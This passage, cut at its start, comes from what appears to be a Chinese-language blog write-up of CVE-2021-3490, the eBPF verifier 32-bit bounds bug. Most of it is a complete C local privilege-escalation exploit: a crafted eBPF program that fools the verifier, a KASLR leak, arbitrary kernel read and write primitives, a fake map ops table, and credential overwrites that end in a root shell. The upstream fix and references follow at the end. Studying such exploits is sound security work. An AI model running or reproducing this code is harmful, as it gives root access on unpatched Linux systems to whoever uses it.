.value = (uint64_t)value,
};
return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}
/* Write *value into the map at *key.  The exploit later abuses `flags`
 * as a raw pointer once the map's ops table has been replaced. */
static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
.flags = flags,
};
return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}
/* Delete the element at *key from the map. */
static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
};
return bpf(BPF_MAP_DELETE_ELEM, &attr);
}
/* Iterate map keys: store the key following *key into *next_key. */
static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.next_key = (uint64_t)next_key,
};
return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}
/*
 * Fetch the btf_id field of a map's bpf_map_info.  With the exploit's
 * corrupted expmap, the kernel-side copy into `info` becomes the 4-byte
 * arbitrary-read primitive.
 *
 * Fix: `info` was uninitialized and the syscall result unchecked, so a
 * failed BPF_OBJ_GET_INFO_BY_FD returned stack garbage; zero-initialize
 * so failure deterministically yields 0.
 */
static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
    struct bpf_map_info info = { 0 };
    union bpf_attr attr = {
        .info.bpf_fd = map_fd,
        .info.info_len = sizeof(info),
        .info.info = (uint64_t)&info,
    };

    bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
    return info.btf_id;
}
/* --- global exploit state --- */
int sockets[2]; // socketpair; writing to sockets[0] runs the attached filter
int map_fd; // control map (value_buf1)
int expmap_fd; // map whose struct bpf_map gets corrupted (value_buf2)
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;
/* Hard-coded kernel symbol addresses for the target build (pre-KASLR-slide).
 * NOTE(review): must be regenerated for any other kernel image. */
uint64_t array_map_ops = 0xffffffff82b0d040;
uint64_t init_cred = 0xffffffff8398fca0;
uint64_t init_task = 0xffffffff83824a80;
uint64_t init_nsproxy = 0xffffffff8398e9c0;
uint64_t map_addr = -1; // leaked address of expmap, -1 until leak() succeeds
uint64_t koffset = -1; // KASLR slide, -1 until leak() succeeds
uint64_t kbase = -1;
uint64_t tag = 0x6159617a6f616958; // "XiaozaYa" little-endian, set via prctl in prep()
uint64_t current_task;
/*
 * The eBPF program: builds R6 so the verifier believes it is 0 while its
 * runtime value is 1 (via the scalar32_min_max_and bug), bypasses ALU
 * sanitation, then uses the resulting OOB access on expmap to leak
 * array_map_ops/map_addr and optionally install fake map ops.
 * Map fds are assumed to be 3 (map_fd) and 4 (expmap_fd).
 */
struct bpf_insn prog[] = {
BPF_LD_MAP_FD(BPF_REG_1, 3), // r1 = [map_fd] = bpf_map ptr1
BPF_MOV64_IMM(BPF_REG_6, 0), // r6 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(uint64_t*)(fp - 8) = r6 = 0
BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr1, r2 = fp - 8
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 != 0 (lookup succeeded) goto pc+1
BPF_EXIT_INSN(), // exit
BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // r9 = r0 = value_buf1 ptr
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_9, 0), // r6 = *(uint64_t*)r9 = value_buf1[0] = 0
BPF_MOV64_IMM(BPF_REG_8, 0xffffffff), // r8 = 0xffffffff
BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = 0xffffffff00000000
BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), // r6 = r6 & r8 = r6 & 0xffffffff00000000 ==> r6 = 0
BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // r6 = r6 + 1 = 1
BPF_MOV64_IMM(BPF_REG_8, 1), // r8 = 1
BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = 0x100000000 = { value = 0x100000000, mask = 0 }
BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2), // r8 = 0x100000002 = { value = 0x100000002, maks = 0 }
BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), // triggers the bug: verifier's 32-bit range becomes [1, 0]
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0), // r8 = value_buf1[0] = 0
BPF_ALU64_IMM(BPF_AND, BPF_REG_8, 1), // r8 = r8 & 1 = 0
BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_8), // r6 = r6 + r8; verifier now believes r6 == 1, runtime r6 == 0
BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // verifier: 2, runtime: 1
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1), // verifier: 0, runtime: 1 -- the vuln reg
BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // verifier: 1, runtime: 2
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2), // verifier: 0, runtime: 2
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1), // verifier: 0, runtime: 1
BPF_LD_MAP_FD(BPF_REG_1, 4), // r1 = [expmap_fd] = bpf_map ptr2
BPF_MOV64_IMM(BPF_REG_8, 0), // r8 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8), // *(uint64_t*)(fp - 8) = r8 = 0
BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr2, r2 = fp - 8
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 != 0 (lookup succeeded) goto pc+1
BPF_EXIT_INSN(), // exit
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 = value_buf2 addr
/* alu_limit bypass: verifier tracks r7 += 0x1000 then r7 -= 0 (it thinks
 * r8 == 0), but at runtime r7 net-moves by 0 then -0x110 below */
BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000),
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110), // r6 = r6 * 0x110 = 1 * 0x110 = 0x110
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6), // r7 = r7 - r6 = value_buf2 addr - 0x110 (OOB: into struct bpf_map)
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), // r8 = *(uint64_t*)r7 = value_buf2[-0x110/8] = array_map_ops
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x18), // *(uint64_t*)(r9 +0x18) = value_buf1[3] = r8 = array_map_ops
BPF_MOV64_REG(BPF_REG_2, BPF_REG_8), // r2 = r8 = array_map_ops
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0xc0), // r8 = *(uint64_t*)(r7 +0xc0) = value_buf2[-(0x110-0xc0)/8] = map_addr
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x20), // *(uint64_t*)(r9 +0x20) = value_buf1[4] = r8 = map_addr
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 8), // r8 = *(uint64_t*)(r9 +8) = value_buf1[1] = arb_read addr
BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 1), // if arb_read addr == NULL goto pc+1
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0x40), // *(uint64_t*)(r7 +0x40) = value_buf2[-(0x110-0x40)/8] = btf = r8
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0x10), // r8 = value_buf1[2] = fake_ops
BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 4), // if arb_write flag == 0 goto pc+4
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), // expmap's bpf_map_ops = r8 = fake_ops
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x18, BPF_MAP_TYPE_STACK), // map_type = BPF_MAP_TYPE_STACK
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x24, -1), // max_entries = -1
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x2c, 0), // spin_lock_off = 0
BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0),
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),
};
#define BPF_LOG_SZ 0x20000
/* Verifier log buffer plus the BPF_PROG_LOAD attribute block. */
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };
union bpf_attr attr = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER, // loadable by unprivileged users (unless unprivileged bpf is disabled)
.insns = (uint64_t) &prog,
.insn_cnt = sizeof(prog) / sizeof(prog[0]),
.license = (uint64_t) "GPL",
.log_level = 2,
.log_buf = (uint64_t) bpf_log_buf,
.log_size = BPF_LOG_SZ,
};
/* Turn off stdio buffering so no output is lost if the kernel panics. */
void init() {
    FILE *streams[] = { stdin, stdout, stderr };

    for (int i = 0; i < 3; i++)
        setbuf(streams[i], NULL);
}
/* Run the attached socket filter by sending one packet through the
 * socketpair; buffer contents are irrelevant (left uninitialized). */
void trigger() {
char buffer[64];
write(sockets[0], buffer, sizeof(buffer));
}
/* Allocate the value buffers, create both ARRAY maps (expected to land on
 * fds 3 and 4, as hard-coded in prog[]), load the eBPF program and attach
 * it to one end of a socketpair. */
void prep() {
value1 = (uint64_t*)calloc(0x2000, 1);
value2 = (uint64_t*)calloc(0x2000, 1);
prctl(PR_SET_NAME, "XiaozaYa"); // comm tag used by leak() to find our task_struct
map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
if (map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
if (expmap_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
prog_fd = bpf(BPF_PROG_LOAD, &attr);
if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
perror("socketpair()"), err_exit("socketpair()");
if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
// puts(bpf_log_buf);
}
/* 4-byte arbitrary read: point expmap's btf field at (addr - 0x58) so
 * BPF_OBJ_GET_INFO_BY_FD reports *(u32 *)addr as info.btf_id.
 * NOTE(review): 0x58 appears to be offsetof(struct btf, id) on this
 * build — verify against the target kernel. */
uint32_t arb_read_4_byte(uint64_t addr) {
value1[0] = 0;
value1[1] = addr - 0x58; // fake btf pointer consumed by prog[]
value1[2] = 0; // no fake-ops installation on this run
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
return bpf_map_get_info_by_fd(expmap_fd);
}
/* 8-byte arbitrary read assembled from two 4-byte reads (low dword first). */
uint64_t arb_read(uint64_t addr) {
    uint64_t result = arb_read_4_byte(addr);

    result |= (uint64_t)arb_read_4_byte(addr + 4) << 32;
    return result;
}
/*
 * Stage the arbitrary-write primitive: point value_buf1[2] at expmap's
 * bpf_map_ops slot and fill value_buf2 with a fake ops table (addresses
 * below are for the target build, relocated by the leaked KASLR slide).
 * After trigger(), expmap behaves as a BPF_MAP_TYPE_STACK whose push
 * path dereferences attacker-controlled values.
 *
 * Fix: removed the unused local `uint64_t buf[0x200/8]`.
 */
void prep_arb_write() {
    value1[0] = 0;
    value1[1] = 0;
    value1[2] = map_addr+0x110+0x20; // address of expmap's ops pointer region
    uint64_t fake_ops[] = {
        0x0,0x0,0x0,0x0,
        0xffffffff81376260,
        0xffffffff813789d0,
        0x0,
        0xffffffff81377290,
        0xffffffff81376430,
        0x0,
        0x0,
        0xffffffff81344740,
        0x0,
        0xffffffff813443b0,
        0x0,
        0xffffffff81376710,
        0xffffffff81377080,
        0xffffffff813764b0,
        0xffffffff81376430,
        0x0,
        0x0,
        0x0,
        0x0,
        0xffffffff81377a80,
        0x0,
        0xffffffff81376cd0,
        0xffffffff813784b0,
        0x0,
        0x0,
        0x0,
        0xffffffff81376350,
        0xffffffff813763b0,
        0xffffffff81376c00,
        0x0,
        0x0,
        0x0,
        0x0,
        0xffffffff81378450,
        0xffffffff82b0c920,
        0xffffffff849b6500,
        0xffffffff82b0d1a0
    };
    /* Relocate every non-NULL entry by the leaked KASLR slide. */
    for (int i = 0; i < sizeof(fake_ops) / 8; i++) {
        if (fake_ops[i]) fake_ops[i] += koffset;
    }
    memcpy(value2, fake_ops, sizeof(fake_ops));
    bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
    bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
    trigger();
}
/* 4-byte arbitrary write: with expmap's map_type forced to
 * BPF_MAP_TYPE_STACK and its ops replaced, the `flags` argument of
 * update_elem is consumed as the destination pointer.
 * NOTE(review): the `val - 1` appears to compensate for an increment in
 * the corrupted push path — confirm against the target kernel. */
void arb_write_4_byte(uint64_t addr, uint32_t val) {
value2[0] = val - 1;
bpf_map_update_elem(expmap_fd, &key, value2, addr);
}
/* 8-byte arbitrary write built from two 4-byte writes (low dword first). */
void arb_write(uint64_t addr, uint64_t val) {
    arb_write_4_byte(addr, (uint32_t)val);
    arb_write_4_byte(addr + 4, (uint32_t)(val >> 32));
}
/* Leak array_map_ops (giving the KASLR slide) and expmap's address via
 * the OOB read, then walk the task list from init_task to locate our own
 * task_struct by the comm tag set in prep(). */
void leak() {
uint64_t buf[0x2000/8] = { 0 };
value1[0] = 0;
value1[1] = 0; // no arb_read target: plain leak run
value1[2] = 0; // no fake-ops installation
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
memset(buf, 0, sizeof(buf));
bpf_map_lookup_elem(map_fd, &key, buf);
// binary_dump("LEAK DATA", buf, 0x100);
/* prog[] stored array_map_ops in value_buf1[3] and expmap's value area
 * address in value_buf1[4] */
if ((buf[3] & 0xffffffff00000fff) == (array_map_ops & 0xffffffff00000fff)) {
koffset = buf[3] - array_map_ops;
kbase = 0xffffffff81000000 + koffset;
map_addr = buf[4] - 0xc0;
hexx("koffset", koffset);
hexx("kbase", kbase);
hexx("map_addr", map_addr);
}
if (koffset == -1) err_exit("FAILED to leak kernel base");
/* rebase the hard-coded symbols with the discovered slide */
array_map_ops += koffset;
init_cred += koffset;
init_task += koffset;
init_nsproxy += koffset;
hexx("init_cred", init_cred);
hexx("init_task", init_task);
hexx("init_nsproxy", init_nsproxy);
current_task = init_task;
/* walk the task list: 0x820 looks like tasks.next, 0xae8 like comm —
 * NOTE(review): offsets are build-specific, verify against vmlinux */
for (;;) {
// hexx("current_task", current_task);
if (arb_read(current_task+0xae8) == tag) {
break;
}
current_task = arb_read(current_task + 0x820) - 0x818;
}
hexx("current_task", current_task);
}
/* Exploit driver: leak KASLR slide, install the write primitive, then
 * patch this task's creds/nsproxy and pop a root shell. */
int main(int argc, char** argv, char** envp)
{
init();
prep();
leak();
prep_arb_write();
/* Each kernel pointer is written as two overlapping 4-byte stores
 * (addr, then addr+2 with val>>16), covering the pointer's low 6 bytes;
 * the top two bytes (0xffff) are assumed already correct.
 * NOTE(review): 0xad0/0xad8/0xb40 look like the real_cred/cred/nsproxy
 * offsets for this build — verify against vmlinux. */
arb_write_4_byte(current_task+0xad8, init_cred&0xffffffff);
arb_write_4_byte(current_task+0xad8+2, (init_cred>>16)&0xffffffff);
arb_write_4_byte(current_task+0xad0, init_cred&0xffffffff);
arb_write_4_byte(current_task+0xad0+2, (init_cred>>16)&0xffffffff);
arb_write_4_byte(current_task+0xb40, init_nsproxy&0xffffffff);
arb_write_4_byte(current_task+0xb40+2, (init_nsproxy>>16)&0xffffffff);
get_root_shell();
puts("EXP NERVER END!"); // unreachable: get_root_shell() always exits
return 0;
}
效果如下:
漏洞修复
patch
如下:
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 757476c91c984..9352a1b7de2dd 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -7084,11 +7084,10 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;
- /* Assuming scalar64_min_max_and will be called so its safe
- * to skip updating register for known 32-bit case.
- */
- if (src_known && dst_known)
+ if (src_known && dst_known) {
+ __mark_reg32_known(dst_reg, var32_off.value);
return;
+ }
/* We get our minimum from the var_off, since that's inherently
* bitwise. Our maximum is the minimum of the operands' maxima.
@@ -7108,7 +7107,6 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
dst_reg->s32_min_value = dst_reg->u32_min_value;
dst_reg->s32_max_value = dst_reg->u32_max_value;
}
-
}
static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm)
{
reg->var_off = tnum_const_subreg(reg->var_off, imm);
reg->s32_min_value = (s32)imm;
reg->s32_max_value = (s32)imm;
reg->u32_min_value = (u32)imm;
reg->u32_max_value = (u32)imm;
}
即在寄存器的低 32 位已知时,及时更新 32 位范围。
参考
【kernel exploit】CVE-2021-3490 eBPF 32位边界计算错误漏洞
【CVE.0x0A】CVE-2021-3490 漏洞复现及简要分析